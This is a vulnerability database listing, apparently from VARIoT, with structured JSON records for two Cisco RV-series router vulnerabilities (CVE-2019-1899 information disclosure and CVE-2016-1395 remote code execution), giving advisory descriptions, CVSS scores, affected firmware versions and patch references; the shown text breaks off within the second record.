All the vulnerabilites related to Cisco - RV130W Wireless-N Multifunction VPN Router
var-201906-0690
Vulnerability from variot
A vulnerability in the web interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to acquire the list of devices that are connected to the guest network. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing a specific URI on the web interface of the router. The Cisco RV110W and so on are all VPN firewall routers from Cisco. An attacker can exploit this issue to obtain sensitive information. This may lead to other attacks. This issue is being tracked by the Cisco Bug IDs CSCvo65058, CSCvo65061 and CSCvo65062
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0690",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv130w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"db": "BID",
"id": "108867"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"db": "NVD",
"id": "CVE-2019-1899"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Baines of Tenable, Inc. .",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-801"
}
],
"trust": 0.6
},
"cve": "CVE-2019-1899",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-1899",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-25712",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-151391",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ykramarz@cisco.com",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1899",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1899",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-1899",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2019-1899",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-1899",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-25712",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-801",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-151391",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"db": "VULHUB",
"id": "VHN-151391"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-801"
},
{
"db": "NVD",
"id": "CVE-2019-1899"
},
{
"db": "NVD",
"id": "CVE-2019-1899"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to acquire the list of devices that are connected to the guest network. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing a specific URI on the web interface of the router. The Cisco RV110W and so on are all VPN firewall routers from Cisco. \nAn attacker can exploit this issue to obtain sensitive information. This may lead to other attacks. \nThis issue is being tracked by the Cisco Bug IDs CSCvo65058, CSCvo65061 and CSCvo65062",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-1899"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"db": "BID",
"id": "108867"
},
{
"db": "VULHUB",
"id": "VHN-151391"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-1899",
"trust": 3.4
},
{
"db": "BID",
"id": "108867",
"trust": 2.6
},
{
"db": "TENABLE",
"id": "TRA-2019-29",
"trust": 1.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.2190",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-801",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-25712",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-151391",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"db": "VULHUB",
"id": "VHN-151391"
},
{
"db": "BID",
"id": "108867"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-801"
},
{
"db": "NVD",
"id": "CVE-2019-1899"
}
]
},
"id": "VAR-201906-0690",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"db": "VULHUB",
"id": "VHN-151391"
}
],
"trust": 1.2914166040000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25712"
}
]
},
"last_update_date": "2024-11-23T22:06:10.271000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20190619-rv-infodis",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-infodis"
},
{
"title": "Patch for Cisco RV110W, RV130W, and RV215W Licensing Issue Vulnerabilities (CNVD-2019-25712)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/172971"
},
{
"title": "Cisco RV110W , RV130W and RV215W Routers Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93951"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-801"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-285",
"trust": 1.9
},
{
"problemtype": "CWE-425",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-151391"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"db": "NVD",
"id": "CVE-2019-1899"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-infodis"
},
{
"trust": 2.9,
"url": "http://www.securityfocus.com/bid/108867"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/research/tra-2019-29"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1899"
},
{
"trust": 1.2,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2190/"
},
{
"trust": 0.9,
"url": "http://www.cisco.com/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1899"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-dos"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rvrouters-dos"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-fileaccess"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"db": "VULHUB",
"id": "VHN-151391"
},
{
"db": "BID",
"id": "108867"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-801"
},
{
"db": "NVD",
"id": "CVE-2019-1899"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"db": "VULHUB",
"id": "VHN-151391"
},
{
"db": "BID",
"id": "108867"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-801"
},
{
"db": "NVD",
"id": "CVE-2019-1899"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"date": "2019-06-20T00:00:00",
"db": "VULHUB",
"id": "VHN-151391"
},
{
"date": "2019-06-19T00:00:00",
"db": "BID",
"id": "108867"
},
{
"date": "2019-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"date": "2019-06-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-801"
},
{
"date": "2019-06-20T03:15:12.480000",
"db": "NVD",
"id": "CVE-2019-1899"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-25712"
},
{
"date": "2020-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-151391"
},
{
"date": "2019-06-19T00:00:00",
"db": "BID",
"id": "108867"
},
{
"date": "2019-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005708"
},
{
"date": "2020-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-801"
},
{
"date": "2024-11-21T04:37:38.757000",
"db": "NVD",
"id": "CVE-2019-1899"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-801"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Vulnerabilities related to authorization in routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005708"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-801"
}
],
"trust": 0.6
}
}
var-201606-0431
Vulnerability from variot
The web-based management interface on Cisco RV110W devices with firmware before 1.2.1.7, RV130W devices with firmware before 1.0.3.16, and RV215W devices with firmware before 1.3.0.8 allows remote attackers to execute arbitrary code as root via a crafted HTTP request, aka Bug ID CSCux82428. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. Multiple Cisco Products are prone to a remote code-execution vulnerability. This may aid in further attacks. This issue being tracked by Cisco Bug ID's CSCux82416, CSCux82422 and CSCux82428
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201606-0431",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.2.7"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.6"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.15"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.9"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.1.3"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.0.21"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.0.7"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.1.4"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.9"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.14"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.10"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.5"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.0.3.16"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-367"
},
{
"db": "NVD",
"id": "CVE-2016-1395"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco would like to thank security researcher Samuel Huntley for finding and reporting this vulnerability.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-367"
}
],
"trust": 0.6
},
"cve": "CVE-2016-1395",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-1395",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-04096",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-90214",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2016-1395",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1395",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2016-1395",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2016-04096",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201606-367",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-90214",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"db": "VULHUB",
"id": "VHN-90214"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-367"
},
{
"db": "NVD",
"id": "CVE-2016-1395"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web-based management interface on Cisco RV110W devices with firmware before 1.2.1.7, RV130W devices with firmware before 1.0.3.16, and RV215W devices with firmware before 1.3.0.8 allows remote attackers to execute arbitrary code as root via a crafted HTTP request, aka Bug ID CSCux82428. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. Multiple Cisco Products are prone to a remote code-execution vulnerability. This may aid in further attacks. \nThis issue being tracked by Cisco Bug ID\u0027s CSCux82416, CSCux82422 and CSCux82428",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1395"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"db": "BID",
"id": "91224"
},
{
"db": "VULHUB",
"id": "VHN-90214"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1395",
"trust": 3.4
},
{
"db": "SECTRACK",
"id": "1036113",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003298",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201606-367",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-04096",
"trust": 0.6
},
{
